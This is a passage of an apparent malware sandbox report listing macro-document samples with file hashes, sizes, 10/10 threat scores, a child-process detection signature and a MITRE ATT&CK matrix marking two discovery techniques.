      c6863b77bc935102ab822a006f8ead9cf9b8f827206dbfd8d08d41a64c8e4f55
      
      
   
    * SHA512
      
      9f195ed46c917e0c1c54b18ee87fa8e8441fd6bfdaf891e107096f3c4f2fbb4523e9cbac76db95b70fbcb43608c3edee9db2a66ccfbbc068da6e73080bd7e8c8
      
      
   
   Score
   10/10
   
   
   
   
   * PROCESS SPAWNED UNEXPECTED CHILD PROCESS
     
     This typically indicates the parent process was compromised via an exploit
     or macro.
   behavioral1

 *  * Target
      
      E1-20200901_102700
      
      
   
    * Size
      
      167KB
      
      
   
    * MD5
      
      4d047a38df59016281af0135f87a5f2d
      
      
   
    * SHA1
      
      fbb3d1bf056d52dcebebd5a4bd253504409e9620
      
      
   
    * SHA256
      
      9a38e43b32da78c76e31d5aeba0db3276a8add0df807025961baa25cd2d33477
      
      
   
    * SHA512
      
      76992b45463ffd73483999640d9c22a8ac632d66a1901b3ff8fd5f61a6f70b6a54b1d3791a4912e7c36a6db35d8d929358f5165a39502f9b5c4837015f5f165e
      
      
   
   Score
   10/10
   
   
   
   
   * PROCESS SPAWNED UNEXPECTED CHILD PROCESS
     
     This typically indicates the parent process was compromised via an exploit
     or macro.
   behavioral2

 *  * Target
      
      E1-20200901_153500
      
      
   
    * Size
      
      169KB
      
      
   
    * MD5
      
      c43249e3d749c8908d621d620094864d
      
      
   
    * SHA1
      
      bc4274cb631d9d552f8d8ea90c6f7c2586f02900
      
      
   
    * SHA256
      
      380ec7963c4ae61fe23694d6d55c5fadd6e0b3edd1703a68eae08a19a45deef4
      
      
   
    * SHA512
      
      fb8d241527d7498dced92993c2b4d4ae48bc48bd1d4de29da80727357ca8a0b0b7666ed0f7cb50065748741e9c657663347df68f99246a41fc4c9c9f8009dda5
      
      
   
   Score
   10/10
   
   
   
   
   * PROCESS SPAWNED UNEXPECTED CHILD PROCESS
     
     This typically indicates the parent process was compromised via an exploit
     or macro.
   behavioral3

 *  * Target
      
      E1-20200901_180500
      
      
   
    * Size
      
      224KB
      
      
   
    * MD5
      
      8124fdead1d01f9f105c6faf58e317a8
      
      
   
    * SHA1
      
      5ed009dbed585a1469216fd2b370ff869b9f0661
      
      
   
    * SHA256
      
      17c3eb375f9bf94a27d63248723dc3f1361b906098c4b854a54e229b6d6f00e1
      
      
   
    * SHA512
      
      10ff30d1167872f4505772adb2792248f22c22d0a8a265adbb30ce35ea1a4edfea2e0f18cc5740afdedbfb93771502b2ed2a6df850e92cae121bb414c3740742
      
      
   
   Score
   10/10
   
   
   
   
   * PROCESS SPAWNED UNEXPECTED CHILD PROCESS
     
     This typically indicates the parent process was compromised via an exploit
     or macro.
   behavioral4

 *  * Target
      
      E1-20200901_212900
      
      
   
    * Size
      
      171KB
      
      
   
    * MD5
      
      ddda070b3802f2466bb12a5ecc3889af
      
      
   
    * SHA1
      
      9e3f19bbabc7fce4b5f67370327bdce424e62eae
      
      
   
    * SHA256
      
      ffd7de3113133a8ab269601664ce5a200cccaa8f3872de1689718f7d4ed7fc1c
      
      
   
    * SHA512
      
      5941d16b95de2a5f56bd0eb1d9c4a7beb1583717c527604cf6131cd8c224ff79bec403c0b1f139b57ac063b81b99575f9dfe0562a5dec5f13aa9364532eb3eee
      
      
   
   Score
   10/10
   
   
   
   
   * PROCESS SPAWNED UNEXPECTED CHILD PROCESS
     
     This typically indicates the parent process was compromised via an exploit
     or macro.
   behavioral5

 *  * Target
      
      E3-20200901_063500
      
      
   
    * Size
      
      180KB
      
      
   
    * MD5
      
      5d63d163ed6d1f6ad050b466e80881c7
      
      
   
    * SHA1
      
      a908b33375cd2a053ba7b7673071bf558ed8f1b7
      
      
   
    * SHA256
      
      0e35f41b8f26b030789a90d798c2e94fbc36f0fff167a78227b05a6fac2efd43
      
      
   
    * SHA512
      
      ff69c35a745e8ccb812982414948b1affa1df660076d3e0e6db74ffc6402ae89571a477dd146f614a573fea0bef63219307694cafd38083708ce78cd5e6c1f19
      
      
   
   Score
   10/10
   
   
   
   
   * PROCESS SPAWNED UNEXPECTED CHILD PROCESS
     
     This typically indicates the parent process was compromised via an exploit
     or macro.
   behavioral6

 *  * Target
      
      E3-20200901_110400
      
      
   
    * Size
      
      172KB
      
      
   
    * MD5
      
      22d248bf4c2625a135ea259bf2e9b23b
      
      
   
    * SHA1
      
      1b88fd9571b18b3a555e6d4be7a3c13e23840bfa
      
      
   
    * SHA256
      
      a2cf8fd11fea05f5f3416294b23e69eb9c7c28f37e0b1acbeb56edbb153b69b7
      
      
   
    * SHA512
      
      ba33b5686707b6faf14b4f953090f3d81bb7f9326b65a3c4247cfc2b1a952e45258049bcff7f52c7d5274623eba76e0815fa47137d00368a798c0292355c0508
      
      
   
   Score
   10/10
   
   
   
   
   * PROCESS SPAWNED UNEXPECTED CHILD PROCESS
     
     This typically indicates the parent process was compromised via an exploit
     or macro.
   behavioral7

 *  * Target
      
      E3-20200901_160000
      
      
   
    * Size
      
      178KB
      
      
   
    * MD5
      
      c940ea960966eae417bfbbdbb2ceea52
      
      
   
    * SHA1
      
      b74e2c3046d2eb4ff225cbea085574cf0bb9effb
      
      
   
    * SHA256
      
      a5f10af1a0817802d95a30c0c3a79cc2fcf9520949afd580cdf7b5ba7f2b6f48
      
      
   
    * SHA512
      
      1781a9be5d3611ff480d3a595bf322d6abbad97f360ac4b53bd4bfcc9a44f74db6c359131b2b723c451282332b8d430dfe324b6386e7a6c228559aa897eae179
      
      
   
   Score
   10/10
   
   
   
   
   * PROCESS SPAWNED UNEXPECTED CHILD PROCESS
     
     This typically indicates the parent process was compromised via an exploit
     or macro.
   behavioral8

 *  * Target
      
      E3-20200901_210000
      
      
   
    * Size
      
      177KB
      
      
   
    * MD5
      
      653a30c4613943ce5bd6e929d9993cf3
      
      
   
    * SHA1
      
      2be658bee033f11ab3213025a01186c0435c8f2f
      
      
   
    * SHA256
      
      e8bc071163937181a3b7d387e48af7d8abdfcfd2b83692bf8132666b773a5480
      
      
   
    * SHA512
      
      68aecea4d750bc9909cd077eb858422673717231d4f1be1c51e8ddda790b432231030f593f153c80e61522b2bbc4371405ca9c091e2923744d663a6d5b530bcf
      
      
   
   Score
   10/10
   
   
   
   
   * PROCESS SPAWNED UNEXPECTED CHILD PROCESS
     
     This typically indicates the parent process was compromised via an exploit
     or macro.
   behavioral9


MITRE ATT&CK MATRIX ATT&CK V6

Initial Access



Execution



Persistence



Privilege Escalation



Defense Evasion



Credential Access



Discovery



Query Registry


18
T1012

System Information Discovery


18
T1082

Lateral Movement



Collection



Exfiltration



Command and Control



Impact



TASKS

STATIC1

macro
Score
8/10


BEHAVIORAL1


Score
10/10


BEHAVIORAL2


Score
10/10


BEHAVIORAL3


Score
10/10


BEHAVIORAL4


Score
10/10


BEHAVIORAL5


Score
10/10


BEHAVIORAL6


Score
10/10


BEHAVIORAL7


Score
10/10


BEHAVIORAL8


Score
10/10


BEHAVIORAL9


Score
10/10



